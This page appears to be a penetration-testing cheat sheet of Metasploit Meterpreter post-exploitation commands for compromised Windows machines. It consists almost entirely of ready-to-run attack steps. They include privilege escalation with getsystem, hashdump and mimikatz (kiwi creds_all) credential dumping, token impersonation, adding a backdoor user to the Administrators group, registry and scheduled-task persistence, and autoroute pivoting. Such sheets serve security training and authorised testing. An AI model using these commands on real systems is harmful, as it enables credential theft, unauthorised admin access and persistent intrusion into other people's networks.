windows meterpreter

shell access (cmd & powershell)

for cmd.exe shell
for powershell
1. load powershell > powershell_shell

windows specific commands

getuid
sysinfo
ipconfig
arp
route
getsystem
getprivs

migrate <system-process>

hashdump

post enumeration

run post/windows/gather/*

incognito | milkdevil/incognito2

load incognito
list_tokens [-u | -g]
impersonate_token "<token>"

# for better results
migrate <pid>
add_user <user> <pass>
add_localgroup Administrators <user>

mimikatz

load kiwi
creds_all

local exploit suggester

run post/multi/recon/local_exploit_suggester

Persistence

persistence -h
use exploit/windows/local/persistence
use exploit/windows/local/registry_persistence

run scheduleme
run schtaskabuse

autoroute

run autoroute -s IP/CIDR
run autoroute -p
[OR]
use post/multi/manage/autoroute

Previousfodhelper Nextshells

Last updated 4 years ago

hashtagshell access (cmd & powershell)

hashtagwindows specific commands

hashtagpost enumeration

hashtagincognito | milkdevil/incognito2arrow-up-right

hashtagmimikatz

hashtaglocal exploit suggester

hashtagPersistence

hashtagautoroute

shell access (cmd & powershell)

windows specific commands

post enumeration

incognito | milkdevil/incognito2

mimikatz

local exploit suggester

Persistence

autoroute